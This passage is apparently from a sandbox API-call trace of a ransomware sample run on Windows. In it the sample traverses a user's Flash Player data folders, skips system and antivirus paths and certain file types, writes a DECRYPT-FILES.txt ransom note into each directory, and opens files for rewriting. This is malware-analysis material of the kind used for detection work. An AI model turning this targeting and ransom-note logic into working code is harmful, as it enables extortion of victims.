lpString2="..") returned -1 [0077.301] lstrcatW (in: lpString1="#SharedObjects", lpString2="\\" | out: lpString1="#SharedObjects\\") returned="#SharedObjects\\" [0077.301] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="#SharedObjects\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\" [0077.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\Program Files") returned 0x0 [0077.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch=":\\Windows") returned 0x0 [0077.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\Games\\") returned 0x0 [0077.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\All Users") returned 0x0 [0077.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="AhnLab") returned 0x0 [0077.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.301] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned 85 [0077.301] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.301] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\\\jkbimi8.tmp") returned 97 [0077.302] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0077.303] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned 85 [0077.303] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.303] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\\\DECRYPT-FILES.txt") returned 103 [0077.303] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0077.303] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0077.304] CloseHandle (hObject=0x454) returned 1 [0077.304] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned 85 [0077.304] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*" [0077.304] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0077.304] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.304] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.304] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.304] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.304] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa47e8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.304] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.304] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa47e8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.304] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.304] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.304] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.304] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.305] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.305] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.305] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.305] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.305] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.305] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.305] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.305] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.305] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.305] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.305] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.305] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned 85 [0077.305] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.305] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\" [0077.305] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\jkbimi8.tmp" [0077.305] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.305] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.305] CloseHandle (hObject=0x0) returned 0 [0077.305] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.306] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="P7Y3F7QB", cAlternateFileName="")) returned 1 [0077.306] lstrcmpW (lpString1="P7Y3F7QB", lpString2=".") returned 1 [0077.306] lstrcmpW (lpString1="P7Y3F7QB", lpString2="..") returned 1 [0077.306] lstrcatW (in: lpString1="P7Y3F7QB", lpString2="\\" | out: lpString1="P7Y3F7QB\\") returned="P7Y3F7QB\\" [0077.306] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2="P7Y3F7QB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\" [0077.306] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\Program Files") returned 0x0 [0077.306] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch=":\\Windows") returned 0x0 [0077.306] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\Games\\") returned 0x0 [0077.306] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.306] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.306] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.306] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.306] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.306] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\All Users") returned 0x0 [0077.306] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.306] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.306] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.306] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="AhnLab") returned 0x0 [0077.306] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.306] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\") returned 94 [0077.306] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.306] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\\\jkbimi8.tmp") returned 106 [0077.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\p7y3f7qb\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0077.307] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\") returned 94 [0077.307] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.307] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\\\DECRYPT-FILES.txt") returned 112 [0077.307] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\p7y3f7qb\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0077.308] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0077.308] CloseHandle (hObject=0x45c) returned 1 [0077.309] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\") returned 94 [0077.309] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\*" [0077.309] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0077.309] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.309] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.309] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.309] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.309] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa47e8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.309] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.309] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa47e8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.309] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.309] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.309] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.309] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.310] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.310] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\") returned 94 [0077.310] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.310] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\" [0077.310] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\jkbimi8.tmp" [0077.310] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.310] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\p7y3f7qb\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.310] CloseHandle (hObject=0x0) returned 0 [0077.310] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.310] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa47e8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.310] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0077.311] CloseHandle (hObject=0x458) returned 1 [0077.311] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="P7Y3F7QB\\", cAlternateFileName="")) returned 0 [0077.311] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0077.311] CloseHandle (hObject=0x450) returned 1 [0077.311] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa47e8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.311] lstrcmpiW 